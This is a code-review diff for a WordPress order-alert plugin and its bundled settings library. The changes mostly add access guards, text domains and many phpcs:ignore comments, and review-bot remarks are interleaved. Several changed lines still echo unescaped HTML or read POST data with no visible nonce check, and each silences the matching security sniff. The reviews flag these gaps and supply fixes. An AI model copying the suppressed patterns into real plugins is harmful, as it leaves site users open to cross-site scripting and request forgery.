+								sprintf( '<a target="_blank" href="%1$s"><strong>%2$s</strong></a>', esc_url( $this->client->integration_server . '/my-account/downloads/' ), esc_html__( 'Download', $this->client->text_domain ) ) // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
+							);
+						?>
                     </p>
                 </div>
             </div>
@@ -445,16 +475,16 @@
 	 */
 	function process_form_submission() {

-		if ( ! wp_verify_nonce( isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : '', $this->license_nonce() ) ) {
+		if ( ! wp_verify_nonce( isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : '', $this->license_nonce() ) ) { // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotValidated, WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
 			return;
 		}

-		$license_key    = isset( $_POST['license_key'] ) ? trim( sanitize_text_field( $_POST['license_key'] ) ) : '';
+		$license_key    = isset( $_POST['license_key'] ) ? trim( sanitize_text_field( $_POST['license_key'] ) ) : ''; // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
 		$license_key    = str_replace( ' ', '', $license_key );
-		$license_action = isset( $_POST['license_action'] ) ? sanitize_text_field( $_POST['license_action'] ) : '';
+		$license_action = isset( $_POST['license_action'] ) ? sanitize_text_field( $_POST['license_action'] ) : ''; // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash

 		if ( empty( $license_key ) || empty( $license_action ) ) {
-			$this->client->print_notice( sprintf( '<p>%s</p>', __( 'Invalid license key', $this->client->text_domain ) ), 'error' );
+			$this->client->print_notice( sprintf( '<p>%s</p>', __( 'Invalid license key', $this->client->text_domain ) ), 'error' ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain

 			return;
 		}
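Review bot: the nonce line keeps reading `$_POST['_wpnonce']` raw and only suppresses three sanitization sniffs. The conventional form is `wp_verify_nonce( isset( $_POST['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ) : '', $this->license_nonce() )`, which satisfies the sniffs without suppressions. The same applies to `license_key` and `license_action`: add `wp_unslash()` inside `sanitize_text_field()` instead of ignoring `MissingUnslash`.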
@@ -576,7 +606,7 @@
 	 * @return string
 	 */
 	private function license_nonce() {
-		return sprintf( 'pb_license_%s', str_replace( '-', '_', $this->client->text_domain ) );
+		return sprintf( 'pb_license_%s', str_replace( '-', '_', $this->client->text_domain ) ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 	}


--- a/woc-order-alert/includes/wp-dev-kit/classes/class-notifications.php
+++ b/woc-order-alert/includes/wp-dev-kit/classes/class-notifications.php
@@ -5,6 +5,8 @@

 namespace WPDK;

+defined( 'ABSPATH' ) || exit;
+
 /**
  * Class Notifications
  *
@@ -45,7 +47,7 @@
 	 * Force check notifications
 	 */
 	function force_check_notifications() {
-		if ( Utils::get_args_option( 'force-check', wp_unslash( $_GET ) ) === 'yes' ) {
+		if ( Utils::get_args_option( 'force-check', wp_unslash( $_GET ) ) === 'yes' ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
 			$this->set_cached_notification_data( $this->get_latest_notification_data() );
 		}
 	}
--- a/woc-order-alert/includes/wp-dev-kit/classes/class-utils.php
+++ b/woc-order-alert/includes/wp-dev-kit/classes/class-utils.php
@@ -5,6 +5,8 @@

 namespace WPDK;

+defined( 'ABSPATH' ) || exit;
+
 /**
  * Class Utils
  *
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/abstract.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/abstract.class.php
@@ -8,6 +8,8 @@
  *
  */

+defined( 'ABSPATH' ) || exit;
+
 if ( ! class_exists( 'WPDK_Settings_Abstract' ) ) {
 	abstract class WPDK_Settings_Abstract {

@@ -19,7 +21,7 @@
 			// Collect output css and typography
 			if ( ! empty( $this->args['output_css'] ) || ! empty( $this->args['enqueue_webfont'] ) ) {
 				add_action( 'wp_enqueue_scripts', array( $this, 'collect_output_css_and_typography' ), 10 );
-				WPDK_Settings::$css = apply_filters( "pb_settings_{$this->unique}_output_css", WPDK_Settings::$css, $this );
+				WPDK_Settings::$css = apply_filters( "pb_settings_{$this->unique}_output_css", WPDK_Settings::$css, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 			}

 		}
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/admin-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/admin-options.class.php
@@ -7,6 +7,9 @@
  * @version 1.0.0
  *
  */
+
+defined( 'ABSPATH' ) || exit;
+
 if ( ! class_exists( 'WPDK_Settings_Options' ) ) {
 	class WPDK_Settings_Options extends WPDK_Settings_Abstract {

@@ -92,8 +95,8 @@
 		public function __construct( $key, $params = array() ) {

 			$this->unique   = $key;
-			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			// run only is admin panel options, avoid performance loss
 			$this->pre_tabs     = $this->pre_tabs( $this->sections );
@@ -227,7 +230,7 @@
 			$result = $this->set_options( true );

 			if ( ! $result ) {
-				wp_send_json_error( array( 'error' => esc_html__( 'Error while saving the changes.' ) ) );
+				wp_send_json_error( array( 'error' => esc_html__( 'Error while saving the changes.', 'woc-order-alert' ) ) );
 			} else {
 				wp_send_json_success( array( 'notice' => $this->notice, 'errors' => $this->errors ) );
 			}
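Review bot: the shared `wp-dev-kit` settings library now hard-codes the `woc-order-alert` text domain here (and in the "Settings successfully imported." and "Default settings restored." hunks below), while the rest of the kit resolves it through `$this->client->text_domain`. That couples a reusable library to one plugin; if the kit is vendored only into this plugin it is harmless, otherwise pass the domain through the same client property.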
@@ -266,7 +269,7 @@

 			// XSS ok.
 			// No worries, This "POST" requests is sanitizing in the below foreach. see #L337 - #L341
-			$response = ( $ajax && ! empty( $_POST['data'] ) ) ? json_decode( wp_unslash( trim( $_POST['data'] ) ), true ) : map_deep( $_POST, 'sanitize_text_field' );
+			$response = ( $ajax && ! empty( $_POST['data'] ) ) ? json_decode( wp_unslash( trim( $_POST['data'] ) ), true ) : map_deep( $_POST, 'sanitize_text_field' ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.NonceVerification.Missing, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized

 			// Set variables.
 			$data      = array();
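Review bot: adding `WordPress.Security.NonceVerification.Missing` to the ignore list records that no nonce is checked on this line but does not add one. The save button is posted as `<unique>[_nonce][save]`, so if that nonce is verified before execution reaches here, say so in the comment (the existing '#L337 - #L341' reference covers sanitization only); if it is not, the AJAX branch that accepts `$_POST['data']` needs a `check_ajax_referer()` call. Also, `json_decode( ..., true )` returns null or a scalar on malformed input, so `$response` should be checked with `is_array()` before the later foreach relies on it.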
@@ -287,7 +290,7 @@
 					$import_data  = json_decode( wp_unslash( trim( $response['pb_settings_import_data'] ) ), true );
 					$options      = ( is_array( $import_data ) && ! empty( $import_data ) ) ? $import_data : array();
 					$importing    = true;
-					$this->notice = esc_html__( 'Settings successfully imported.' );
+					$this->notice = esc_html__( 'Settings successfully imported.', 'woc-order-alert' );

 				}

@@ -299,7 +302,7 @@
 						}
 					}

-					$this->notice = esc_html__( 'Default settings restored.' );
+					$this->notice = esc_html__( 'Default settings restored.', 'woc-order-alert' );

 				} else if ( ! empty( $transient['reset_section'] ) && ! empty( $section_id ) ) {

@@ -315,7 +318,7 @@

 					$data = wp_parse_args( $data, $this->options );

-					$this->notice = esc_html__( 'Default settings restored.' );
+					$this->notice = esc_html__( 'Default settings restored.', 'woc-order-alert' );

 				} else {

@@ -371,18 +374,18 @@

 				}

-				$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $this );
+				$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-				do_action( "pb_settings_{$this->unique}_save_before", $data, $this );
+				do_action( "pb_settings_{$this->unique}_save_before", $data, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 				$this->options = $data;

 				$this->save_options( $data );

-				do_action( "pb_settings_{$this->unique}_save_after", $data, $this );
+				do_action( "pb_settings_{$this->unique}_save_after", $data, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 				if ( empty( $this->notice ) ) {
-					$this->notice = esc_html__( 'Settings saved.' );
+					$this->notice = esc_html__( 'Settings saved.', 'woc-order-alert' );
 				}

 				return true;
@@ -406,7 +409,7 @@
 				update_option( $this->unique, $data );
 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}

@@ -537,7 +540,7 @@
 			$nav_type      = ( $this->args['nav'] === 'inline' ) ? 'inline' : 'normal';
 			$form_action   = ( $this->args['form_action'] ) ? $this->args['form_action'] : '';

-			do_action( 'pb_settings_options_before' );
+			do_action( 'pb_settings_options_before' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			echo '<div class="pb_settings wpdk_settings-options' . esc_attr( $theme . $class . $wrapper_class ) . '" data-slug="' . esc_attr( $this->args['menu_slug'] ) . '" data-unique="' . esc_attr( $this->unique ) . '">';

@@ -559,8 +562,8 @@
 			echo '<div class="wpdk_settings-header-left">';
 			echo '<h1>' .
 			     esc_html( $this->args['framework_title'] ) .
-			     ( empty( $product_version ) ? '' : sprintf( '<a href="%s" target="_blank" class="wpdk_settings-version-free">Version %s</a>', $product_url, $product_version ) ) .
-			     ( empty( $product_version_pro ) ? '' : sprintf( '<a href="%s" target="_blank" class="wpdk_settings-version-pro">Pro %s</a>', $product_url, $product_version_pro ) ) .
+			     ( empty( $product_version ) ? '' : sprintf( '<a href="%s" target="_blank" class="wpdk_settings-version-free">Version %s</a>', $product_url, $product_version ) ) . // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+			     ( empty( $product_version_pro ) ? '' : sprintf( '<a href="%s" target="_blank" class="wpdk_settings-version-pro">Pro %s</a>', $product_url, $product_version_pro ) ) . // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			     '</h1>';
 			echo '</div>';

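Review bot: the two `OutputNotEscaped` suppressions on the version links leave `$product_url` and `$product_version` / `$product_version_pro` unescaped inside the echoed `<h1>`; escaping at the point of output is cheap here: `esc_url( $product_url )` for the `href` and `esc_html( $product_version )` for the link text, after which both ignore comments can be dropped.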
@@ -571,11 +574,11 @@

 			echo '<div class="wpdk_settings-form-result wpdk_settings-form-success ' . esc_attr( $notice_class ) . '">' . esc_html( $notice_text ) . '</div>';

-			echo ( $this->args['show_form_warning'] ) ? '<div class="wpdk_settings-form-result wpdk_settings-form-warning">' . esc_html__( 'Save your changes!' ) . '</div>' : '';
+			echo ( $this->args['show_form_warning'] ) ? '<div class="wpdk_settings-form-result wpdk_settings-form-warning">' . esc_html__( 'Save your changes!', 'woc-order-alert' ) . '</div>' : '';

-			echo ( $has_nav && $this->args['show_all_options'] ) ? '<div class="wpdk_settings-expand-all" title="' . esc_html__( 'show all settings' ) . '"><i class="fas fa-outdent"></i></div>' : '';
+			echo ( $has_nav && $this->args['show_all_options'] ) ? '<div class="wpdk_settings-expand-all" title="' . esc_html__( 'show all settings', 'woc-order-alert' ) . '"><i class="fas fa-outdent"></i></div>' : '';

-			echo ( $this->args['show_search'] ) ? '<div class="wpdk_settings-search"><input type="text" name="wpdk_settings-search" placeholder="' . esc_html__( 'Search...' ) . '" autocomplete="off" /></div>' : '';
+			echo ( $this->args['show_search'] ) ? '<div class="wpdk_settings-search"><input type="text" name="wpdk_settings-search" placeholder="' . esc_html__( 'Search...', 'woc-order-alert' ) . '" autocomplete="off" /></div>' : '';

 			echo '<div class="wpdk_settings-buttons">';

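Review bot: the added text domain is correct, but the `show all settings` and `Search...` strings are emitted inside HTML attributes (`title="..."`, `placeholder="..."`), where `esc_attr__()` is the matching escaper; `esc_html__()` does not escape for attribute context. The same applies to the `value=`, `data-save=` and `data-confirm=` strings on the Save and Reset buttons in the next hunk.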
@@ -585,9 +588,9 @@
 				}
 			}

-			echo '<input type="submit" name="' . esc_attr( $this->unique ) . '[_nonce][save]" class="button button-primary wpdk_settings-top-save wpdk_settings-save' . esc_attr( $ajax_class ) . '" value="' . esc_html__( 'Save' ) . '" data-save="' . esc_html__( 'Saving...' ) . '">';
-			echo ( $this->args['show_reset_section'] ) ? '<input type="submit" name="pb_settings_transient[reset_section]" class="button button-secondary wpdk_settings-reset-section wpdk_settings-confirm" value="' . esc_html__( 'Reset Section' ) . '" data-confirm="' . esc_html__( 'Are you sure to reset this section options?' ) . '">' : '';
-			echo ( $this->args['show_reset_all'] ) ? '<input type="submit" name="pb_settings_transient[reset]" class="button wpdk_settings-warning-primary wpdk_settings-reset-all wpdk_settings-confirm" value="' . ( ( $this->args['show_reset_section'] ) ? esc_html__( 'Reset All' ) : esc_html__( 'Reset' ) ) . '" data-confirm="' . esc_html__( 'Are you sure you want to reset all settings to default values?' ) . '">' : '';
+			echo '<input type="submit" name="' . esc_attr( $this->unique ) . '[_nonce][save]" class="button button-primary wpdk_settings-top-save wpdk_settings-save' . esc_attr( $ajax_class ) . '" value="' . esc_html__( 'Save', 'woc-order-alert' ) . '" data-save="' . esc_html__( 'Saving...', 'woc-order-alert' ) . '">';
+			echo ( $this->args['show_reset_section'] ) ? '<input type="submit" name="pb_settings_transient[reset_section]" class="button button-secondary wpdk_settings-reset-section wpdk_settings-confirm" value="' . esc_html__( 'Reset Section', 'woc-order-alert' ) . '" data-confirm="' . esc_html__( 'Are you sure to reset this section options?', 'woc-order-alert' ) . '">' : '';
+			echo ( $this->args['show_reset_all'] ) ? '<input type="submit" name="pb_settings_transient[reset]" class="button wpdk_settings-warning-primary wpdk_settings-reset-all wpdk_settings-confirm" value="' . ( ( $this->args['show_reset_section'] ) ? esc_html__( 'Reset All', 'woc-order-alert' ) : esc_html__( 'Reset', 'woc-order-alert' ) ) . '" data-confirm="' . esc_html__( 'Are you sure you want to reset all settings to default values?', 'woc-order-alert' ) . '">' : '';
 			echo '</div>';

 			echo '</div>';
@@ -684,7 +687,7 @@
 				} elseif ( $section['external'] && isset( $section['id'] ) ) {
 					do_action( 'WPDK_Settings/section/' . $section['id'], $section );
 				} else {
-					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.' ) . '</div>';
+					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.', 'woc-order-alert' ) . '</div>';
 				}

 				echo '</div>';
@@ -707,13 +710,13 @@

 				if ( ! empty( $this->args['show_footer_buttons'] ) ) {
 					echo '<div class="wpdk_settings-buttons">';
-					echo '<input type="submit" name="pb_settings_transient[save]" class="button button-primary wpdk_settings-save' . esc_attr( $ajax_class ) . '" value="' . esc_html__( 'Save' ) . '" data-save="' . esc_html__( 'Saving...' ) . '">';
-					echo ( $this->args['show_reset_section'] ) ? '<input type="submit" name="pb_settings_transient[reset_section]" class="button button-secondary wpdk_settings-reset-section wpdk_settings-confirm" value="' . esc_html__( 'Reset Section' ) . '" data-confirm="' . esc_html__( 'Are you sure to reset this section options?' ) . '">' : '';
-					echo ( $this->args['show_reset_all'] ) ? '<input type="submit" name="pb_settings_transient[reset]" class="button wpdk_settings-warning-primary wpdk_settings-reset-all wpdk_settings-confirm" value="' . ( ( $this->args['show_reset_section'] ) ? esc_html__( 'Reset All' ) : esc_html__( 'Reset' ) ) . '" data-confirm="' . esc_html__( 'Are you sure you want to reset all settings to default values?' ) . '">' : '';
+					echo '<input type="submit" name="pb_settings_transient[save]" class="button button-primary wpdk_settings-save' . esc_attr( $ajax_class ) . '" value="' . esc_html__( 'Save', 'woc-order-alert' ) . '" data-save="' . esc_html__( 'Saving...', 'woc-order-alert' ) . '">';
+					echo ( $this->args['show_reset_section'] ) ? '<input type="submit" name="pb_settings_transient[reset_section]" class="button button-secondary wpdk_settings-reset-section wpdk_settings-confirm" value="' . esc_html__( 'Reset Section', 'woc-order-alert' ) . '" data-confirm="' . esc_html__( 'Are you sure to reset this section options?', 'woc-order-alert' ) . '">' : '';
+					echo ( $this->args['show_reset_all'] ) ? '<input type="submit" name="pb_settings_transient[reset]" class="button wpdk_settings-warning-primary wpdk_settings-reset-all wpdk_settings-confirm" value="' . ( ( $this->args['show_reset_section'] ) ? esc_html__( 'Reset All', 'woc-order-alert' ) : esc_html__( 'Reset', 'woc-order-alert' ) ) . '" data-confirm="' . esc_html__( 'Are you sure you want to reset all settings to default values?', 'woc-order-alert' ) . '">' : '';
 					echo '</div>';
 				}

-				echo ( ! empty( $this->args['footer_text'] ) ) ? '<div class="wpdk_settings-copyright">' . $this->args['footer_text'] . '</div>' : '';
+				echo ( ! empty( $this->args['footer_text'] ) ) ? '<div class="wpdk_settings-copyright">' . $this->args['footer_text'] . '</div>' : ''; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped

 				echo '<div class="clear"></div>';
 				echo '</div>';
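Review bot: `$this->args['footer_text']` is still echoed raw; the new `OutputNotEscaped` suppression marks it as reviewed but does not constrain it. Since this is operator-configured HTML, `wp_kses_post( $this->args['footer_text'] )` keeps the intended markup while stripping script-bearing content, and removes the need for the ignore comment.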
@@ -726,11 +729,11 @@

 			echo '<div class="clear"></div>';

-			echo ( ! empty( $this->args['footer_after'] ) ) ? $this->args['footer_after'] : '';
+			echo ( ! empty( $this->args['footer_after'] ) ) ? $this->args['footer_after'] : ''; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped

 			echo '</div>';

-			do_action( 'pb_settings_options_after' );
+			do_action( 'pb_settings_options_after' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}
 	}
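Review bot: same issue as `footer_text` above: `$this->args['footer_after']` is echoed unescaped with only a suppression comment added. Wrap it in `wp_kses_post()` unless the caller guarantees it is already escaped, and state that guarantee in the comment instead of the bare `phpcs:ignore`.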
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/comment-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/comment-options.class.php
@@ -31,8 +31,8 @@
 		public function __construct( $key, $params = array() ) {

 			$this->unique     = $key;
-			$this->args       = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections   = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args       = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections   = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 			$this->pre_fields = $this->pre_fields( $this->sections );

 			add_action( 'add_meta_boxes_comment', array( $this, 'add_comment_meta_box' ) );
@@ -196,7 +196,7 @@

 				} else {

-					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.' ) . '</div>';
+					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.', 'woc-order-alert' ) . '</div>';

 				}

@@ -213,8 +213,8 @@
 				echo '<div class="wpdk_settings-sections-reset">';
 				echo '<label>';
 				echo '<input type="checkbox" name="' . esc_attr( $this->unique ) . '[_reset]" />';
-				echo '<span class="button wpdk_settings-button-reset">' . esc_html__( 'Reset' ) . '</span>';
-				echo '<span class="button wpdk_settings-button-cancel">' . sprintf( '<small>( %s )</small> %s', esc_html__( 'update post' ), esc_html__( 'Cancel' ) ) . '</span>';
+				echo '<span class="button wpdk_settings-button-reset">' . esc_html__( 'Reset', 'woc-order-alert' ) . '</span>';
+				echo '<span class="button wpdk_settings-button-cancel">' . sprintf( '<small>( %s )</small> %s', esc_html__( 'update post', 'woc-order-alert' ), esc_html__( 'Cancel', 'woc-order-alert' ) ) . '</span>';
 				echo '</label>';
 				echo '</div>';

@@ -308,9 +308,9 @@

 			}

-			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $comment_id, $this );
+			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $comment_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_before", $data, $comment_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_before", $data, $comment_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( empty( $data ) || ! empty( $request['_reset'] ) ) {

@@ -338,9 +338,9 @@

 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $comment_id, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $comment_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_after", $data, $comment_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_after", $data, $comment_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}
 	}
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/customize-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/customize-options.class.php
@@ -33,8 +33,8 @@
     public function __construct( $key, $params ) {

       $this->unique     = $key;
-      $this->args       = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-      $this->sections   = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+      $this->args       = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+      $this->sections   = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
       $this->pre_fields = $this->pre_fields( $this->sections );

       $this->get_options();
@@ -59,9 +59,9 @@
     }

     public function add_customize_save_after( $wp_customize ) {
-      do_action( "pb_settings_{$this->unique}_save_before", $this->get_options(), $this, $wp_customize );
-      do_action( "pb_settings_{$this->unique}_saved", $this->get_options(), $this, $wp_customize );
-      do_action( "pb_settings_{$this->unique}_save_after", $this->get_options(), $this, $wp_customize );
+      do_action( "pb_settings_{$this->unique}_save_before", $this->get_options(), $this, $wp_customize ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+      do_action( "pb_settings_{$this->unique}_saved", $this->get_options(), $this, $wp_customize ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+      do_action( "pb_settings_{$this->unique}_save_after", $this->get_options(), $this, $wp_customize ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
     }

     // get default value
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/metabox-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/metabox-options.class.php
@@ -40,8 +40,8 @@
 		public function __construct( $key, $params = array() ) {

 			$this->unique         = $key;
-			$this->args           = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections       = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args           = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections       = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 			$this->post_type      = ( is_array( $this->args['post_type'] ) ) ? $this->args['post_type'] : array_filter( (array) $this->args['post_type'] );
 			$this->post_formats   = ( is_array( $this->args['post_formats'] ) ) ? $this->args['post_formats'] : array_filter( (array) $this->args['post_formats'] );
 			$this->page_templates = ( is_array( $this->args['page_templates'] ) ) ? $this->args['page_templates'] : array_filter( (array) $this->args['page_templates'] );
@@ -222,7 +222,7 @@
 					$tab_error = ( ! empty( $errors['sections'][ $tab_key ] ) ) ? '<i class="wpdk_settings-label-error wpdk_settings-error">!</i>' : '';
 					$tab_icon  = ( ! empty( $section['icon'] ) ) ? '<i class="wpdk_settings-tab-icon ' . esc_attr( $section['icon'] ) . '"></i>' : '';

-					printf( '<li><a href="#" data-section="%s">%s%s%s</a></li>', ( $this->unique . '_' . $tab_key ), $tab_icon, $section['title'], $tab_error );
+					printf( '<li><a href="#" data-section="%s">%s%s%s</a></li>', ( $this->unique . '_' . $tab_key ), $tab_icon, $section['title'], $tab_error ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped

 					$tab_key ++;
 				}
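Review bot: the `printf()` for the tab links now carries an `OutputNotEscaped` suppression, yet `$section['title']` is interpolated unescaped while `$section['icon']` two lines earlier is correctly passed through `esc_attr()`; use `esc_html( $section['title'] )` for the link text and `esc_attr()` on the `data-section` value, and the suppression becomes unnecessary.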
@@ -275,7 +275,7 @@
 					do_action( 'WPDK_Settings/meta_section/' . $section['id'], $section );

 				} else {
-					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.' ) . '</div>';
+					echo '<div class="wpdk_settings-no-option">' . esc_html__( 'No data available.', 'woc-order-alert' ) . '</div>';
 				}

 				echo '</div>';
@@ -291,8 +291,8 @@
 				echo '<div class="wpdk_settings-sections-reset">';
 				echo '<label>';
 				echo '<input type="checkbox" name="' . esc_attr( $this->unique ) . '[_reset]" />';
-				echo '<span class="button wpdk_settings-button-reset">' . esc_html__( 'Reset' ) . '</span>';
-				echo '<span class="button wpdk_settings-button-cancel">' . sprintf( '<small>( %s )</small> %s', esc_html__( 'update post' ), esc_html__( 'Cancel' ) ) . '</span>';
+				echo '<span class="button wpdk_settings-button-reset">' . esc_html__( 'Reset', 'woc-order-alert' ) . '</span>';
+				echo '<span class="button wpdk_settings-button-cancel">' . sprintf( '<small>( %s )</small> %s', esc_html__( 'update post', 'woc-order-alert' ), esc_html__( 'Cancel', 'woc-order-alert' ) ) . '</span>';
 				echo '</label>';
 				echo '</div>';

@@ -325,7 +325,7 @@

 			// XSS ok.
 			// No worries, This "POST" requests is sanitizing in the below foreach.
-			$request = ( ! empty( $_POST[ $this->unique ] ) ) ? wp_unslash( $_POST[ $this->unique ] ) : array();
+			$request = ( ! empty( $_POST[ $this->unique ] ) ) ? wp_unslash( $_POST[ $this->unique ] ) : array(); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized

 			if ( ! empty( $request ) ) {

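Review bot: the `InputNotSanitized` suppression and the comment above it cover sanitization, but nothing in this hunk shows a nonce check for `$_POST[ $this->unique ]`; if this method verifies a nonce earlier, name it in the comment, otherwise `wp_verify_nonce()` belongs before the `wp_unslash()` call. The comment's grammar should also be fixed: "This POST request is sanitized in the foreach below."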
@@ -395,9 +395,9 @@

 			}

-			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $post_id, $this );
+			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $post_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_before", $data, $post_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_before", $data, $post_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( empty( $data ) || ! empty( $request['_reset'] ) ) {

@@ -425,9 +425,9 @@

 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $post_id, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $post_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_after", $data, $post_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_after", $data, $post_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}
 	}
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/nav-menu-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/nav-menu-options.class.php
@@ -24,8 +24,8 @@
 		public function __construct( $key, $params ) {

 			$this->unique   = $key;
-			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			add_action( 'wp_nav_menu_item_custom_fields', array( $this, 'wp_nav_menu_item_custom_fields' ), 10, 4 );
